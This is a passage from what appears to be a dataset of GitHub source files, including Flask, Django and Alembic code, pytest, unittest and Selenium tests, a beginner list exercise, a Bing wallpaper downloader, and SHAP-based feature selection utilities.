product record to the db\"\"\"\n try:\n product = Product(**data)\n\n db.session.add(product)\n try:\n db.session.commit()\n except MySQLdb.IntegrityError as e:\n # log exception\n print(str(e))\n return None\n\n # refresh the inserted object and get id\n db.session.refresh(product)\n if not product.id:\n return None\n\n return product.id\n except MySQLdb.IntegrityError as e:\n # log exception\n print(str(e))\n return None\n\n def get_one(self, id):\n \"\"\"retrieve product from db by id\"\"\"\n product = Product.query.filter_by(id=id).first()\n if not product:\n return None\n\n return product.serializer\n\n def get_all(self):\n \"\"\"retrieve all products from the db\"\"\"\n products = Product.query.all()\n\n if not products:\n return None\n\n return [\n product.serializer\n for product in products\n ]\n\n def update_product(self, id, data):\n \"\"\"update product record in db by id\"\"\"\n product = Product.query.filter_by(id=id).update(data)\n if not product:\n return None\n db.session.commit()\n\n return product\n\n def delete_product(self, id):\n \"\"\"delete product from the db by id\"\"\"\n product = Product.query.filter_by(id=id).first()\n\n if not product:\n return None\n db.session.delete(product)\n db.session.commit()\n product = Product.query.filter_by(id=id).first()\n\n if product:\n return None\n\n return True","repo_name":"Hillary-KG/kefis","sub_path":"api/app/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22951992710","text":"import json, pytest\nfrom movies.cache import Cache\nfrom movies.constants import DEFAULT_CACHE_MINUTES, MINUTE_IN_SECONDS\n\n\nclass TestCache:\n\n @pytest.fixture\n def cache_instances(self):\n instances = []\n for _ in range(10):\n instance = Cache()\n instances.append(instance)\n return instances\n\n @pytest.fixture\n def key_value(self):\n data = {\n \"name\": \"Web Developer career\",\n \"start\": 2017,\n \"status\": \"in progress\",\n \"company\": \"Magalu\"\n }\n return {\n 'key': 'test_data',\n 'value': json.dumps(data)\n }\n\n @pytest.fixture\n def custom_key_value(self, key_value):\n custom_k_v = key_value.copy()\n custom_k_v['key'] = 'custom_test_data'\n return custom_k_v\n\n @pytest.fixture\n def cache_time(self):\n return MINUTE_IN_SECONDS\n\n @pytest.fixture\n def set_key_value_on_cache(self, cache_instances, key_value):\n cache_instances[0].set_value(\n key_value['key'], key_value['value']\n )\n\n @pytest.fixture\n def set_value_with_specific_expire_time(\n self,\n cache_instances,\n cache_time,\n custom_key_value\n ):\n cache_instances[1].set_value(\n custom_key_value['key'],\n custom_key_value['value'],\n cache_time\n )\n\n def test_cache_instances_share_same_redis_client(self, cache_instances):\n for i in range(1, len(cache_instances)):\n assert cache_instances[i].client == cache_instances[i - 1].client\n\n def test_get_value_on_cache(\n self,\n cache_instances,\n set_key_value_on_cache,\n key_value\n ):\n cached_data = (cache_instances[1].get_value(key_value['key'])).decode('utf-8')\n assert cached_data == key_value['value']\n\n def test_get_default_expire_time(\n self,\n cache_instances,\n set_key_value_on_cache,\n key_value\n ):\n expire_time = cache_instances[0].get_expire_time(key_value['key'])\n assert expire_time == DEFAULT_CACHE_MINUTES * MINUTE_IN_SECONDS\n\n def test_get_custom_expire_time(\n self,\n cache_instances,\n cache_time,\n custom_key_value,\n
set_value_with_specific_expire_time\n ):\n expire_time = cache_instances[2].get_expire_time(custom_key_value['key'])\n assert expire_time == cache_time\n","repo_name":"marcelo-vp/movies","sub_path":"movies/cache/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20947402024","text":"\"\"\"your message\n\nRevision ID: 6813d72b29fb\nRevises: a99f1b59bd3e\nCreate Date: 2022-04-07 17:29:50.011377\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = '6813d72b29fb'\ndown_revision = 'a99f1b59bd3e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('hero', sa.Column('headquarter', sqlmodel.sql.sqltypes.AutoString(), nullable=True))\n op.alter_column('hero', 'age',\n existing_type=sa.INTEGER(),\n nullable=True)\n op.alter_column('hero', 'id',\n existing_type=sa.INTEGER(),\n nullable=True,\n autoincrement=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('hero', 'id',\n existing_type=sa.INTEGER(),\n nullable=False,\n autoincrement=True)\n op.alter_column('hero', 'age',\n existing_type=sa.INTEGER(),\n nullable=False)\n op.drop_column('hero', 'headquarter')\n # ### end Alembic commands ###\n","repo_name":"ngaller/fastapi_alembic_xp","sub_path":"alembic/versions/6813d72b29fb_your_message.py","file_name":"6813d72b29fb_your_message.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35551866600","text":"# Bots properties\nBOTS_COUNT = 64\nBOTS_CLONES = 7\nMIN_BOTS = 8\nENERGY = 70\nMAX_ENERGY = 150\n\n# Genes properties\nHIGHEST_GENE = 63\nMAX_GENES_COUNT = 64\nMAX_MUTATION_GENES = 6\n\n# World properties\nWORLD_WIDTH = 66\nWORLD_HEIGHT = 33\n\n# max values properties\nMAX_FOOD = 250\nMAX_POISON = 100\nMIN_FOOD = 50\nMIN_POISON = 60\n\n# Window properties\nMAX_X = 1780\nMAX_Y = 889\nMARGIN = 2\nDEFAULT_SIZE = 25\n","repo_name":"yurii-piets/genom-mutation","sub_path":"src/const/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"110804560","text":"#!/usr/bin/env python3\n\n# --------------------------------\n# 06/29/19 Jinee Han\n# Python Programming Lesson 3\n# List Lab\n# ---------------------------------\n\n# Series 1\n'''\nCreate a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.\nDisplay the list (plain old print() is fine…).\nAsk the user for another fruit and add it to the end of the list.\nDisplay the list.\nAsk the user for a number and display the number back to the user and the fruit corresponding to that number (on a 1-is-first basis).\nRemember that Python uses zero-based indexing, so you will need to correct.\nAdd another fruit to the beginning of the list using “+” and display the list.\nAdd another fruit to the beginning of the list using insert() and display the list.\nDisplay all the fruits that begin with “P”, using a for loop.\n'''\n\nprint (\"Testing series 1.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"] # Create a list\nprint (fruit_list,'\\n') # Print the list\n\nask_user = input (\"Would you like to add a 
fruit? (y/n)\") # Ask the user\nif ask_user == \"y\": # Add the fruit to the list\n add_fruit = input (\"Which fruit would you like to add?\\n\")\n fruit_list.append(add_fruit)\n print (fruit_list) # Display the appended list\nelse:\n print (\"\\nNo item was added.\\n\")\n\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nask_number = input(\"Enter the number to see the fruit from the list\\n\") # Ask user for a number to display\nprint(fruit_list[int(ask_number)-1]) # Display the fruit\n\nadd_another_fruit_with_plus = input(\"Let's add another fruit. Please type in.\\n \") # Add another fruit.\nfruit_list = [add_another_fruit_with_plus] + fruit_list # Adding by using '+'\nprint (fruit_list)\n\nadd_another_fruit_with_insert = input(\"Final addition. What is the fruit name?\\n\") # Add another fruit.\nfruit_list.insert(0, add_another_fruit_with_insert) # Adding by using insert()\nprint (\"Here is the final fruit list.\")\nprint (fruit_list)\n\n\n# Display all the fruits that begin with 'P'\n\nprint (\"\\nLet's find the fruits that start with P\\n\")\nfor items in fruit_list:\n if items.startswith('P'):\n print(items)\n else:\n continue\n\n# 2. Series 2\n'''\nDisplay the list.\nRemove the last fruit from the list.\nDisplay the list.\nAsk the user for a fruit to delete, find it and delete it.\n(Bonus: Multiply the list times two. Keep asking until a match is found. Once found, delete all occurrences.)\n'''\n\nprint (\"\\nTesting Series 2\\n\")\nprint (fruit_list) # Display the list\nprint (\"\\nRemoving the last item\\n\")\nfruit_list.pop() # Remove the last fruit from the list\nprint (fruit_list) # Display the list\nprint(\"\\nHere is the list to delete from\\n\")\nfruit_list_2 = fruit_list * 2 # Multiply the list times two to delete all occurrences\nprint (fruit_list_2)\nask_what_to_delete = input(\"\\nWhich fruit do you want to delete?\") # Ask the user what to delete\nfor item in fruit_list_2[:]: # iterate over a copy so removing items does not skip elements\n print(\"I am looking for the match.\") # Keep looking until a match is found.\n if ask_what_to_delete == item:\n fruit_list_2.remove(item)\n else:\n continue\nprint (fruit_list_2)\n\n# 3. Series 3\n'''\nAsk the user for input displaying a line like “Do you like apples?” for each fruit in the list (making the fruit all lowercase).\nFor each “no”, delete that fruit from the list.\nFor any answer that is not “yes” or “no”, prompt the user to answer with one of those two values (a while loop is good here)\nDisplay the list.\n'''\n\nprint (\"\\nTesting Series 3.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nremoving_list = []\nfor item in fruit_list:\n do_you_like_fruit = input(\"Do you like {}? (y/n)\".format(item.lower()))\n if do_you_like_fruit == 'n':\n removing_list.append(item)\n else:\n continue\nfinal_list = list(set(fruit_list)-set(removing_list))\n\nprint(\"You want to remove these items: \", removing_list)\nprint(\"You deleted fruits you don't like. Here is the remaining list:\\n \", final_list)\n\n# 4. Series 4\n'''\nMake a new list with the contents of the original, but with all the letters in each item reversed.\nDelete the last item of the original list.
Display the original list and the copy.\n'''\nprint (\"\\nTesting series 4.\\n\")\nfruit_list = [\"Apples\",\"Pears\",\"Oranges\",\"Peaches\"]\nnew_list = [] # create a new list for a reversed fruit list\nfor item in fruit_list: # Reverse the fruit name\n item = item[::-1]\n new_list.append(item)\nprint (\"Reversed item list: \", new_list)\n\n\ncopy_list = fruit_list.copy()\n\nfruit_list.pop() # Delete the last item of the original list\nprint (\"Original list, which the last item deleted: \", fruit_list) # Display the original list\nprint(\"Copy list: \",copy_list) # Display a copy list","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/jinee_han/lesson03/List_Lab.py","file_name":"List_Lab.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"11249499981","text":"from django.shortcuts import render, HttpResponse, redirect\n\nfrom .models import Author, Book\n\n# Create your views here.\ndef index(request):\n context = {\n 'all_authors' : Author.objects.all(),\n 'all_books' : Book.objects.all()\n }\n return render(request, \"index.html\", context)\n\ndef addingBook(request):\n Book.objects.create(\n title = request.POST['titleLabel'],\n desc = request.POST['descLabel']\n )\n\n return redirect('/')\n\ndef bookView(request, id):\n context = {\n 'this_book': Book.objects.get(id=id),\n 'all_authors': Author.objects.all()\n }\n\n return render(request, \"book_info.html\", context)\n\n\ndef authorToBook(request, id2):\n selected_book = Book.objects.get(id=id2) \n selected_author = Author.objects.get(id=request.POST['authorSelect']) \n \n selected_book.authors.add(selected_author)\n\n\n return redirect(request.META.get('HTTP_REFERER'))\n\n\ndef addAuthor(request):\n context = {\n 'all_authors': Author.objects.all(),\n 'all_books': Book.objects.all()\n }\n return render(request, \"authors.html\", context)\n\ndef realAddAuthor(request):\n Author.objects.create(\n first_name = request.POST['firstNameLabel'],\n last_name = request.POST['lastNameLabel'],\n notes = request.POST['notesLabel']\n )\n\n return redirect(request.META.get('HTTP_REFERER'))\n\ndef showAuthor(request, id3):\n context = {\n 'this_author': Author.objects.get(id=id3),\n 'all_books': Book.objects.all()\n }\n return render(request, \"author_info.html\", context)\n\n\ndef bookToAuthor(request, id4):\n selected_author = Author.objects.get(id=id4) \n selected_book = Book.objects.get(id=request.POST['bookSelect']) \n \n selected_book.authors.add(selected_author)\n\n\n return redirect(request.META.get('HTTP_REFERER'))","repo_name":"emad998/python","sub_path":"django/django_orm/books_authors/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31368120361","text":"import math\nfrom typing import Any, Dict, List, Optional\n\nfrom tools.logger import Logger\nfrom tools.sql import DatabaseType, QueryParams, SQLConnect\n\n\nclass SQLPaginator:\n def __init__(\n self,\n sql_connect: SQLConnect,\n query_string: str,\n pg_query_string: Optional[str] = None,\n count_query_string: Optional[str] = None,\n pg_count_query_string: Optional[str] = None,\n query_params: Optional[QueryParams] = None,\n client_row_count: Optional[int] = None,\n client_page_size: Optional[int] = None,\n client_page_number: Optional[int] = None,\n ):\n self.logger = Logger.for_object(self)\n self.sql_connect: 
SQLConnect = sql_connect\n self.query_string: str = query_string\n self.pg_query_string: str = pg_query_string or \"\"\n self.count_query_string: str = count_query_string or \"\"\n self.pg_count_query_string: str = pg_count_query_string or \"\"\n self.query_params: Optional[QueryParams] = query_params\n self.page_size: int = client_page_size or 10\n self.page_number: int = client_page_number or 1\n self._row_count: Optional[int] = client_row_count\n\n @property\n def page_of_results(self) -> List[Dict[str, Any]]:\n if self.sql_connect.route.database_type == DatabaseType.POSTGRESQL and self.pg_query_string:\n results = self.sql_connect.get_dict_query_results(\n query_string=self.pg_query_string,\n query_params=self.query_params,\n )\n else:\n results = self.sql_connect.get_dict_query_results(\n query_string=self.query_string,\n query_params=self.query_params,\n )\n\n return list(results)\n\n @property\n def row_count(self) -> int:\n if self.count_query_string or self.pg_count_query_string:\n # Determines the total row_count from database.\n if (\n self.sql_connect.route.database_type == DatabaseType.POSTGRESQL\n and self.pg_count_query_string\n ):\n count_results_list = self.sql_connect.get_dict_query_results(\n self.pg_count_query_string, self.query_params\n )\n else:\n count_results_list = self.sql_connect.get_dict_query_results(\n self.count_query_string, self.query_params\n )\n\n count_results = count_results_list[0] if count_results_list else {}\n self._row_count = count_results.get(\"found_rows\", 0) if count_results else 0\n elif not self._row_count:\n self._row_count = self.sql_connect.get_row_count()\n\n self.logger.debug(f\">>>row_count: row_count<<<<: {self._row_count}\")\n return self._row_count # type: ignore\n\n @property\n def page_count(self) -> int:\n self.logger.debug(\n f\">>>page_count: row_count<<<<: {self.row_count}, page_size: {self.page_size}\"\n )\n return math.ceil(self.row_count / self.page_size)\n","repo_name":"voyager-gold/alti-network","sub_path":"external_api/external_api/utils/sql_paginator.py","file_name":"sql_paginator.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26521966913","text":"#!/usr/bin/env python3\n\"\"\"\nThis module contains all the code used to test the testee module.\n\"\"\"\n\n\nimport unittest\nfrom os import remove\nfrom os.path import realpath, dirname, join, isfile\n\nfrom auxi.tools.materialphysicalproperties import polynomial as testee\nfrom auxi.tools.materialphysicalproperties.core import DataSet\n\n\n__version__ = '0.3.6'\n__license__ = 'LGPL v3'\n__copyright__ = 'Copyright 2016, Ex Mente Technologies (Pty) Ltd'\n__author__ = 'Johan Zietsman'\n__credits__ = ['Johan Zietsman']\n__maintainer__ = 'Johan Zietsman'\n__email__ = 'johan.zietsman@ex-mente.co.za'\n__status__ = 'Planning'\n\n\nMODULE_PATH = dirname(realpath(__file__))\n\n\nclass PolynomialModelTTester(unittest.TestCase):\n \"\"\"\n The tester for the PolynomialModelT class.\n \"\"\"\n\n def _test_properties(self, model):\n self.assertEqual(model.material, 'Air')\n self.assertEqual(model.property, 'Density')\n self.assertEqual(model.symbol, 'rho')\n self.assertEqual(model.display_symbol, '\\\\rho')\n self.assertEqual(model.references, None)\n self.assertEqual(model.datasets, ['dataset-air-lienhard2015.csv'])\n\n coeffs = [2.207010112413834e-28, -1.8498386015487013e-24,\n 6.761238643515948e-21, -1.415594789179995e-17,\n 1.875696238757754e-14, -1.6406192076125332e-11,\n 
9.591604317302061e-09, -3.714488392719117e-06,\n 0.0009239972475093591, -0.13882710545123356,\n 11.147387712425617]\n\n for c, cref in zip(model._coeffs, coeffs):\n self.assertAlmostEqual(c, cref)\n\n def test_create(self):\n \"\"\"\n Test whether a model is created successfully from a data set.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_read(self):\n \"\"\"\n Test whether a model is created successfully by loading it from a json\n file.\n \"\"\"\n model = testee.PolynomialModelT.read(join(MODULE_PATH,\n 'data/air-rho.json'))\n self._test_properties(model)\n\n def test_write(self):\n \"\"\"\n Test whether a model is successfully written to a json file.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n\n json_path = join(MODULE_PATH, 'test.json')\n\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n model.write(json_path)\n self.assertTrue(isfile(json_path))\n model = testee.PolynomialModelT.read(json_path)\n remove(json_path)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_construct(self):\n \"\"\"\n Test whether a model is constructed successfully.\n \"\"\"\n\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n\n model = testee.PolynomialModelT.read(file_path)\n testee.PolynomialModelT(model.material, model.property, model.symbol,\n model.display_symbol, model.units,\n model.references, model.datasets,\n model._coeffs)\n self._test_properties(model)\n\n @unittest.skip(\"This test needs attention.\")\n def test_calculate(self):\n \"\"\"\n Test whether the property value is calculated successfully.\n \"\"\"\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n model = testee.PolynomialModelT.read(file_path)\n\n T = 100.0\n # self.assertEqual(model.calculate(T=T), 3.6026669128620208)\n self.assertEqual(model.calculate(T=T), 3.6049798036305774)\n T = 200.0\n self.assertEqual(model.calculate(T=T), 1.7581685372604081)\n T = 300.0\n self.assertEqual(model.calculate(T=T), 1.1791874628593089)\n T = 400.0\n self.assertEqual(model.calculate(T=T), 0.87918802181468259)\n T = 500.0\n self.assertEqual(model.calculate(T=T), 0.70171039180794637)\n T = 600.0\n self.assertEqual(model.calculate(T=T), 0.59118824960721206)\n\n @unittest.skip(\"This test needs attention. 
It throws an error in Travis.CI\")\n def test_plot(self):\n \"\"\"\n Test whether the plots are created.\n \"\"\"\n dataset_path = join(MODULE_PATH, 'data/dataset-air-lienhard2015.csv')\n dataset = DataSet(dataset_path)\n model = testee.PolynomialModelT.create(dataset, 'rho', 10)\n\n pdf_path = join(MODULE_PATH, 'test.pdf')\n\n model.plot(dataset, pdf_path)\n self.assertTrue(isfile(pdf_path))\n remove(pdf_path)\n\n @unittest.skip(\"This test needs attention.\")\n def test_call(self):\n \"\"\"\n Test whether the property value is calculated successfully via the\n __call__ magic method.\n \"\"\"\n file_path = join(MODULE_PATH, 'data/air-rho.json')\n model = testee.PolynomialModelT.read(file_path)\n\n T = 100.0\n self.assertEqual(model(T=T), 3.6026669128620208)\n T = 200.0\n self.assertEqual(model(T=T), 1.7581685372604081)\n T = 300.0\n self.assertEqual(model(T=T), 1.1791874628593089)\n T = 400.0\n self.assertEqual(model(T=T), 0.87918802181468259)\n T = 500.0\n self.assertEqual(model(T=T), 0.70171039180794637)\n T = 600.0\n self.assertEqual(model(T=T), 0.59118824960721206)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Ex-Mente/auxi.0","sub_path":"auxi/tools/materialphysicalproperties/polynomial_test.py","file_name":"polynomial_test.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"38427113481","text":"\"\"\"\nhttps://leetcode-cn.com/problems/subarray-product-less-than-k/\n\nGiven an integer array nums and an integer k, return the number of contiguous subarrays where the product of all the elements in the subarray is strictly less than k.\n\nExample 1:\n Input: nums = [10,5,2,6], k = 100\n Output: 8\n Explanation: the 8 subarrays with a product less than 100 are: [10], [5], [2], [6], [10,5], [5,2], [2,6], [5,2,6].\n Note that [10,5,2] is not such a subarray, because its product is not less than 100.\n\nExample 2:\n Input: nums = [1,2,3], k = 0\n Output: 0\n\nConstraints:\n 1 <= nums.length <= 3 * 10^4\n 1 <= nums[i] <= 1000\n 0 <= k <= 10^6\n\n\"\"\"\nfrom typing import List\nfrom math import log\nimport bisect\n\n\"\"\"Approach 1: binary search\"\"\"\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n if k == 0:\n return 0\n ans = 0\n n = len(nums)\n logPrefix = [0] * (n + 1)\n for i, num in enumerate(nums):\n logPrefix[i + 1] = logPrefix[i] + log(num)\n logK = log(k)\n for j in range(1, n + 1):\n l = bisect.bisect_right(logPrefix, logPrefix[j] - logK + 1e-10, 0, j)\n ans += j - l\n return ans\n\n\"\"\"Approach 2: sliding window\"\"\"\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n ans = 0 # number of valid subarrays\n prod = 1\n i = 0 # left endpoint\n for j, num in enumerate(nums): # right endpoint index and value of the subarray\n prod *= num # multiply in the current value\n while i <= j and prod >= k: # while the running product is >= k\n prod //= nums[i] # drop the leftmost number\n i += 1 # move the left pointer one step right\n ans += j - i + 1 # count the valid subarrays whose right endpoint is j\n return ans\n\nif __name__ == \"__main__\":\n nums = [10,5,2,6]\n k = 100\n sol = Solution()\n result = sol.numSubarrayProductLessThanK(nums, k)\n print (result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/2_medium/0713_乘积小于K的子数组.py","file_name":"0713_乘积小于K的子数组.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72260554340","text":"from selenium.webdriver.common.by import By\nimport time\n\nlink = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_search_button(browser):\n browser.get(link)\n time.sleep(15) # so that you can see the button\n button = browser.find_elements(By.XPATH, '//*[@id=\"add_to_basket_form\"]/button')\n assert len(button) > 0, 'button not
found'\n\n","repo_name":"Ulok-05/3.6.Stepic_homework","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44762066173","text":"import requests\nimport re\nimport os\n\n\ndef get_img_url(url):\n bing_text = requests.get(url).text\n return url+re.search('url: \\\\\"(.*?\\\\.jpg)\\\\\"', bing_text).group(1)\n\n\ndef save_img(image_url):\n r = requests.get(image_url, stream=True)\n with open(\"C:/Users/AlphaGo/Pictures/windows_background/background.jpg\", \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n\n\ndef empty_old_dir(path):\n for f in os.listdir(path):\n os.remove(path+'/'+f)\n\nif __name__ == '__main__':\n img_url = get_img_url(\"http://cn.bing.com\")\n empty_old_dir(\"C:/Users/AlphaGo/Pictures/windows_background\")\n save_img(img_url)","repo_name":"Negahead/nlp","sub_path":"bing_wallpaper.py","file_name":"bing_wallpaper.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32484486528","text":"import pandas as pd \nimport numpy as np\nfrom typing import Union\nfrom scipy.sparse import csr_matrix, csc_matrix\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split, cross_val_score\nimport sklearn\nimport shap\n\n\nclass ShapFeatureExtractor:\n \"\"\"\n Calculates shap feature importances based on xgboost classifier.\n \"\"\"\n\n def __init__(self, vocabulary):\n self.shap_values = None\n self.feature_strength_metric = None\n self.classes = []\n self.vocabulary = vocabulary\n \n def fit(self, X, y):\n \"\"\"\n Fit feature extractor\n Arguments:\n X - word counts (output from CountVectorizer)\n y - array-like with class labels for X\n \"\"\"\n if isinstance(y, np.ndarray):\n classes = np.unique(y) \n elif isinstance(y, (pd.Series, pd.DataFrame)):\n classes = y.unique()\n else:\n raise ValueError(f'Unexpected type for y: {type(y)}. 
y must be array like')\n \n self.classes = classes\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n train_dmatrix = xgb.DMatrix(X_train, label=y_train)\n test_dmatrix = xgb.DMatrix(X_test, label=y_test)\n\n if len(classes) > 2:\n param = {'max_depth':25, 'eta':0.05, 'lambda': 0.001, 'objective':'multi:softprob', 'num_class': len(classes) }\n else:\n param = {'max_depth':25, 'eta':0.05, 'lambda': 0.001, 'objective':'binary:logistic' }\n \n model = xgb.train(param, dtrain=train_dmatrix, evals=[(train_dmatrix, 'train'), (test_dmatrix, 'test')], num_boost_round=1000, early_stopping_rounds=100, verbose_eval=False)\n\n explainer = shap.TreeExplainer(model, feature_names=self.vocabulary)\n shap_values = explainer.shap_values(test_dmatrix, check_additivity=False)\n\n self.shap_values = shap_values\n\n\n if len(classes) > 2:\n # for multiclass classification, shap values are unique per each category, so we take the max \n # across the classes (just like with filtering methods, where applicable)\n shap_vals_avg_per_class_list = []\n for cls in shap_values:\n shap_vals_avg_per_class_list.append(np.mean(np.abs(cls), axis=0) )\n shap_vals_avg_per_class = np.vstack(shap_vals_avg_per_class_list)\n self.feature_strength_metric = np.maximum.reduce(shap_vals_avg_per_class)\n else: \n self.feature_strength_metric = np.mean(np.abs(shap_values), axis=0) \n \n def get_n_words_shap(self, n_words):\n \"\"\"\n Get n_words most important words from vocabulary per class according to shap values. Will return duplicates per class label for consistency with other methods.\n \"\"\"\n\n\n return self.vocabulary[self.feature_strength_metric.argsort()[-n_words:]]\n \n def filter_n_best(self, X, n_best):\n \"\"\"\n Leave n_best terms.\n Arguments:\n X - dataset to filter out terms from \n n_best - number of terms to leave\n Returns:\n X_filtered - filtered dataset\n vocabulary_filtered - vocabulary of the new filtered dataset (will have length of n_best)\n \"\"\"\n selected_index = self.feature_strength_metric.argsort()[-n_best:]\n if isinstance(X, pd.DataFrame):\n X_filtered = X.iloc[:, selected_index]\n else:\n X_filtered = X[:, selected_index]\n vocabulary_filtered = self.vocabulary[selected_index]\n\n return X_filtered, vocabulary_filtered\n\n def remove_n_best(self, X, n_words):\n \"\"\"\n Remove n_best features.\n Arguments:\n X - dataset to filter out terms from\n n_words - [int] number of terms to remove\n vocabulary - [list] list of words present in the dataset\n Returns:\n X_filtered - filtered dataset\n vocabulary_filtered - dropped words\n \"\"\"\n # selected_index = self.feature_strength_metric.argsort()[:-n_words]\n selected_index = self.feature_strength_metric.argsort()[n_words:]\n dropped_index = self.feature_strength_metric.argsort()[-n_words:]\n\n if isinstance(X, pd.DataFrame):\n X_filtered = X.iloc[:, selected_index]\n else:\n X_filtered = X[:, selected_index]\n vocabulary_filtered = self.vocabulary[dropped_index]\n\n return X_filtered, vocabulary_filtered\n\n\nclass LinearForwardSearch():\n \n estimator = None\n ranker = None\n vocabulary = None\n selected_idx = None\n epsillon = 1E-4 \n\n def __init__(self, estimator, ranker, vocabulary):\n \"\"\"\n Linear Forward Search feature extractor. 
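At each step the forward search below only evaluates the k top-ranked features that are not yet selected, which bounds the number of cross-validated subset evaluations per round.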
Ref: https://researchcommons.waikato.ac.nz/handle/10289/2205\n Arguments:\n estimator - estimator to use for feature subset evaluation\n ranker - filtering feature extractor to use for initial feature ranking\n vocabulary - list of words present in the dataset\n \"\"\"\n self.estimator = estimator\n self.ranker = ranker\n self.vocabulary = vocabulary\n\n def forward_search_step(self, X, y, k, R, selected_index):\n estimator = sklearn.base.clone(self.estimator)\n ranked_features_idx = R[-(k+len(selected_index)):]\n features_to_check = [idx for idx in ranked_features_idx if idx not in selected_index]\n\n best_score = 0\n best_idx = -1\n\n for feature in features_to_check:\n curr_feature_list = np.append(selected_index, feature)\n if isinstance(X, pd.DataFrame):\n X_ = X.iloc[:, curr_feature_list]\n else:\n X_ = X[:,curr_feature_list]\n scores = cross_val_score(estimator, X_, y, cv=5, scoring='roc_auc', n_jobs=-1)\n score = np.mean(scores)\n if score > best_score:\n best_score = score \n best_idx = feature\n \n return np.append(selected_index, best_idx).astype(int), best_score\n\n\n\n def fit(self, X, y, k, n_words = None):\n self.ranker.fit(X, y)\n R = self.ranker.feature_strength_metric.argsort()\n\n if n_words is None:\n selected_idx = []\n best_score = 0\n for i in range(X.shape[1]):\n selected_idx, score = self.forward_search_step(X, y, k, R, selected_idx)\n if (score - best_score) < self.epsillon:\n break\n best_score = score\n else:\n selected_idx = []\n for i in range(n_words):\n selected_idx, score = self.forward_search_step(X, y, k, R, selected_idx)\n \n self.selected_idx = R[selected_idx]\n return self.selected_idx\n \n def get_selected_words_lfs(self):\n return self.vocabulary[self.selected_idx]\n \n\n","repo_name":"trotskii/shapley-values-based-feature-selection-benchmarking","sub_path":"src/preprocessing/feature_extraction/text/wrapping.py","file_name":"wrapping.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5997447228","text":"from typing import Dict, Optional, Type\n\nimport graphene\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_django import DjangoObjectType\n\nfrom simple_graphql.django.fields import DjangoAutoConnectionField\nfrom simple_graphql.django.fields.node import DjangoAutoNode\nfrom simple_graphql.django.types import ModelClass, ModelSchemaConfig\n\n\ndef build_ordering_enum(\n *, model_cls: ModelClass, args: ModelSchemaConfig\n) -> Optional[graphene.Enum]:\n if not args.ordering_fields:\n return None\n return graphene.Enum(\n f\"{model_cls.__name__}Ordering\",\n [\n (f\"{x}_{direction}\".upper(), x if direction == \"asc\" else f\"-{x}\")\n for x in (args.ordering_fields or [])\n for direction in (\"asc\", \"desc\")\n ],\n )\n\n\ndef build_query_fields(\n *,\n model_cls: ModelClass,\n node_cls: Type[DjangoObjectType],\n) -> Dict[str, graphene.Field]:\n query_name = to_snake_case(model_cls.__name__)\n return {\n f\"get_{query_name}\": DjangoAutoNode.Field(node_cls),\n 